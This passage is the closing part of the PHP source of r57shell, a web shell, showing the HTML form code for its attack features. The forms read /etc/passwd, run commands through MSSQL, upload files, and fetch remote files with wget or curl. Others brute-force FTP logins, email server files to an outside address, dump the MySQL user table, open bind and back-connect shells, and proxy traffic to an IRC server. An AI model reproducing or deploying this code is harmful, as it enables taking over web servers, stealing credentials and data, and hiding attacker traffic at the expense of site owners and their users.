| 2153 | echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); | ||
| 2154 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2155 | } | ||
| 2156 | if($safe_mode&&$mssql_on) | ||
| 2157 | { | ||
| 2158 | echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; | ||
| 2159 | echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); | ||
| 2160 | echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); | ||
| 2161 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2162 | } | ||
| 2163 | if(@ini_get('file_uploads')){ | ||
| 2164 | echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; | ||
| 2165 | echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; | ||
| 2166 | echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); | ||
| 2167 | echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); | ||
| 2168 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2169 | } | ||
| 2170 | if(!$safe_mode&&!$windows){ | ||
| 2171 | echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; | ||
| 2172 | echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); | ||
| 2173 | echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); | ||
| 2174 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2175 | } | ||
| 2176 | echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; | ||
| 2177 | echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); | ||
| 2178 | $arh = $lang[$language.'_text92']; | ||
| 2179 | if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } | ||
| 2180 | if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } | ||
| 2181 | |||
| 2182 | if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } | ||
| 2183 | echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); | ||
| 2184 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2185 | if(@function_exists("ftp_connect")){ | ||
| 2186 | echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; | ||
| 2187 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; | ||
| 2188 | echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); | ||
| 2189 | echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); | ||
| 2190 | echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); | ||
| 2191 | echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); | ||
| 2192 | echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); | ||
| 2193 | echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); | ||
| 2194 | echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); | ||
| 2195 | echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; | ||
| 2196 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; | ||
| 2197 | echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); | ||
| 2198 | echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); | ||
| 2199 | echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); | ||
| 2200 | echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); | ||
| 2201 | echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); | ||
| 2202 | echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); | ||
| 2203 | echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); | ||
| 2204 | echo $te."</td>".$fe."</tr></div></table>"; | ||
| 2205 | } | ||
| 2206 | if($unix && @function_exists("ftp_connect")){ | ||
| 2207 | echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; | ||
| 2208 | echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); | ||
| 2209 | echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); | ||
| 2210 | echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); | ||
| 2211 | echo $te.'</div>'.$table_end1.$fe; | ||
| 2212 | } | ||
| 2213 | if(@function_exists("mail")){ | ||
| 2214 | echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; | ||
| 2215 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; | ||
| 2216 | echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); | ||
| 2217 | echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); | ||
| 2218 | echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); | ||
| 2219 | echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); | ||
| 2220 | echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); | ||
| 2221 | echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; | ||
| 2222 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; | ||
| 2223 | echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); | ||
| 2224 | echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); | ||
| 2225 | echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); | ||
| 2226 | echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); | ||
| 2227 | $arh = $lang[$language.'_text92']; | ||
| 2228 | if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } | ||
| 2229 | if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } | ||
| 2230 | if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } | ||
| 2231 | echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); | ||
| 2232 | echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); | ||
| 2233 | echo $te."</td>".$fe."</tr></div></table>"; | ||
| 2234 | } | ||
| 2235 | if($mysql_on||$mssql_on||$pg_on||$ora_on) | ||
| 2236 | { | ||
| 2237 | $select = '<select name=db>'; | ||
| 2238 | if($mysql_on) $select .= '<option>MySQL</option>'; | ||
| 2239 | if($mssql_on) $select .= '<option>MSSQL</option>'; | ||
| 2240 | if($pg_on) $select .= '<option>PostgreSQL</option>'; | ||
| 2241 | if($ora_on) $select .= '<option>Oracle</option>'; | ||
| 2242 | $select .= '</select>'; | ||
| 2243 | echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; | ||
| 2244 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>"; | ||
| 2245 | echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); | ||
| 2246 | echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); | ||
| 2247 | echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); | ||
| 2248 | echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); | ||
| 2249 | echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); | ||
| 2250 | echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); | ||
| 2251 | echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); | ||
| 2252 | echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; | ||
| 2253 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; | ||
| 2254 | echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); | ||
| 2255 | echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); | ||
| 2256 | echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); | ||
| 2257 | echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); | ||
| 2258 | echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); | ||
| 2259 | echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); | ||
| 2260 | echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); | ||
| 2261 | echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); | ||
| 2262 | echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); | ||
| 2263 | echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; | ||
| 2264 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; | ||
| 2265 | echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); | ||
| 2266 | echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); | ||
| 2267 | echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); | ||
| 2268 | echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); | ||
| 2269 | echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); | ||
| 2270 | echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); | ||
| 2271 | echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; | ||
| 2272 | } | ||
| 2273 | if(!$safe_mode&&!$windows){ | ||
| 2274 | echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; | ||
| 2275 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; | ||
| 2276 | echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); | ||
| 2277 | echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); | ||
| 2278 | echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); | ||
| 2279 | echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); | ||
| 2280 | echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; | ||
| 2281 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; | ||
| 2282 | echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); | ||
| 2283 | echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); | ||
| 2284 | echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); | ||
| 2285 | echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); | ||
| 2286 | echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; | ||
| 2287 | echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; | ||
| 2288 | echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); | ||
| 2289 | echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); | ||
| 2290 | echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); | ||
| 2291 | echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); | ||
| 2292 | echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); | ||
| 2293 | echo $te."</td>".$fe."</tr></div></table>"; | ||
| 2294 | } | ||
| 2295 | |||
| 2296 | echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table> | ||
| 2297 | |||
| 2298 | |||
| 2299 | </body></html>"; | ||
| 2300 | |||
| 2301 | |||
| 2302 | ?> \ No newline at end of file | ||